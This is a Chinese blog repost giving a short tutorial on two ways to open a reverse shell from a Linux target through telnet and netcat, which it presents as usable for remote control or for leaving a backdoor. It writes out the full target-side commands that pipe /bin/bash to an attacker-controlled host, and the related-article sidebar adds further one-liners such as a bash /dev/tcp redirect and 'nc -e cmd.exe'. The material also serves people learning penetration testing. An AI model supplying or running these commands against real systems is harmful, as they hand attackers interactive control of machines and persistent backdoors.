[Shell]Telnet反弹shell

最新推荐文章于 2024-05-03 19:48:28 发布
最新推荐文章于 2024-05-03 19:48:28 发布
阅读量494 收藏 1
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/-mo-/p/11528930.html
版权

原作者:包子love
文章出处:黑白之道

今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。

前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。

这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。

0x01 第一种

1.攻击机先执行监听:nc -l 2222
1561366-20190916183617912-1509147783.png

2.目标机执行:mknod a p; telnet x.x.x.x 2222 0<a | /bin/bash 1>a (x.x.x.x为攻击机ip)

1561366-20190916183629652-379565252.png

3.攻击机已经获得shell(没有提示),尝试执行命令:

1561366-20190916183643103-1273728482.png

0x02 第二种

1.攻击机需要开两个终端分别监听两个端口:nc -l 6666,nc -l 5555
1561366-20190916183715060-685264852.png

2.目标机执行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x为攻击机ip)

1561366-20190916183727113-95886340.png

3.目标机已经获得shell,尝试执行命令(第一个终端执行命令会在第二个终端回显):

1561366-20190916183742904-1648682512.png

这就是利用telnet反弹shell的两种方式,当然也不仅有这两种,网上可以找到其他各种反弹的方式,不过原理都差不多。

本次演示使用的两个系统都是centos7,且近乎初始化的系统,演示是截图这种效果。根据操作系统不同,有的系统获取到shell或者被目标机telnet连接时是会有回显的。

0x03 参考链接

利用telnet反弹shell的两种方法

转载于:https://www.cnblogs.com/-mo-/p/11528930.html

baguangman5501
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell
songling515010475的专栏
05-11 1642
一、通过bash反弹shell 1、 在攻击机上通过nc命令监听2222端口 ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ... 2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口 [root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1 3、连..
[小白/详细]AC2100刷机教程&开启telnet失败&刷Breed----各类问题解决方案
10-24
‘nc.exe'不是内部或外部命令,也不是可运行的程序 或批处理文件。...Task_反弹shell无法粘贴 Task_PPPOE服务器一直出现请求回复的异常 1)刷写breed命令等待过长,无反应 2)telnet 192.168.31.1-无效
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7575
反弹shell姿势大全,看这一篇就够啦~
2024年Linux最全如何用shell脚本实现自动telnet_(sleep 1;) telnet(1),2024年最新Linux运维高级工程师进阶学习
最新发布
05-03 968
很多人认为telnet象passwd和su一样,无法通过管道和输入转向使其自动工作,但实际上telnet是支持输入转向的.虽然,严格的说,shell脚本无法使telnet进入交互状态,但它确实可你使你进入远程系统并运行你希望的命令后退出.这远比用rsh(remsh,rcmd)更令人放心,其中user,passwd,yourcmd,remotehost分别更换成你的用户名,用户口令,你想要运行的命令,远程机器名或IP便可以了. 如果要想使用脚本进入交互状态,可以使用expect.
利用telnet反弹shell的两种方法
天涯的浪子
09-16 4657
今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。 这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。 攻击机: 目标机: 下面给大家...
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2405
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
linux内网渗透1
08-03
攻击者使用Metasploit(MSF)生成Python反弹shell,通过LHOST和LPORT参数设置回连地址和端口。一旦shell反弹回来,攻击者可以执行各种操作。然后,使用扫描工具探测内网开放的服务,如FTP、SMB、SNMP和端口。 6. *...
内网转发姿势 作者:未知.pdf
04-08
nc反弹cmdshell #### 2.1 nc简介 `nc`(Netcat)是一款非常强大的网络调试和探测工具,可以用来创建端口监听、发送数据等操作。 #### 2.2 使用步骤 - **肉鸡侧操作**:在肉鸡上执行`nc -l -p 2333 -t -e cmd.exe`...
内网渗透流程与思路和工具讲解
04-10
例如fscan是一款用go语言编写的开源内网综合扫描工具,支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控...
第二十八课:基于MSF发现内网存活主机第六季1
08-03
2. `auxiliary/scanner/telnet/telnet_version`:telnet_version模块扫描开放的Telnet端口,获取主机上运行的Telnet服务版本信息。 3. `auxiliary/scanner/discovery/udp_probe`:通过发送UDP数据包并检查响应来...
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6100
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell常见方法总结
qq_45746681的博客
10-08 729
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
反弹Shell原理与实现
m0_62451321的博客
11-14 3164
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
【安全知识】,看完不会的来打我
imtokenmax众筹
04-06 1260
将标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。
内网渗透-反弹shell的N种姿势
lza20001103的博客
04-15 1065
内网渗透-反弹shell的N种姿势
反弹shell的N种姿势
热门推荐
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
正向shell反弹shell
07-27
正向shell反弹shell都是与远程服务器建立连接的方式,但它们的工作原理和使用场景有所不同。 正向shell是指通过在目标服务器上运行一个监听程序,等待来自客户端的连接。客户端主动连接到目标服务器上的监听端口,建立起双向通信,然后可以执行命令、传输文件等操作。正向shell通常用于在目标服务器上部署一个后门,以便随时可以通过客户端连接进行管理和控制。 反弹shell则是指在目标服务器上运行一个监听程序,等待来自攻击者的连接。攻击者通过在自己的机器上运行一个客户端程序,主动连接到目标服务器上的监听端口,建立起双向通信。一旦连接建立成功,攻击者就可以执行命令、操控目标服务器等。反弹shell通常用于在目标服务器上执行远程攻击或渗透测试。 需要注意的是,正向shell反弹shell都属于潜在的安全威胁,只能在合法和授权的情况下使用。任何未经授权的使用都是非法的,并可能涉及违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值